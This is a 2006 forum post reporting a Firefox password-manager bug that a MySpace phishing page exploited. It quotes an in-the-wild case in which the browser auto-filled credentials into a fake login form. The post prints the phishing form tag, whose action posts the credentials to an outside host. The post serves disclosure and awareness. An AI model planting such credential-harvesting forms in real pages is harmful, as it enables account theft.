11-22-2006, 11:14 AM
A new bug in Firefox exposes the password manager to phishers on websites:
full bug report: https://bugzilla.mozilla.org/show_bug.cgi?id=360493
This bug helped phishers to compromise MySpace accounts late last month:
Phishers compromise MySpace accounts with fake login form on MySpace's own site
http://community.tuliptools.com/index.ph...667.0.html
Quote:I was shocked today to find an in-the-wild phish that uses nothing more than
cross-site forms, and also extracts information from the Password Manger!
The underlying method was so obvious that it should have raised multiple
warnings. There were none at all.
It was in a MySpace profile that included this tag:
Code:<form name="2" action="http://membres.lycos.fr/adel88duran/plaguedoctor.php"
method="post">
What followed was a nearly perfect-looking MySpace login form that used simple
HTML and absolute positioning.
Not only did FireFox fail to raise a warning, it auto-filled my www.myspace.com
username and password into this form!! I hope anyone reading this realizes it
is a security failure for the browser to auto-fill the membres.lycos.fr form
with credentials from another website...
full bug report: https://bugzilla.mozilla.org/show_bug.cgi?id=360493
This bug helped phishers to compromise MySpace accounts late last month:
Phishers compromise MySpace accounts with fake login form on MySpace's own site
http://community.tuliptools.com/index.ph...667.0.html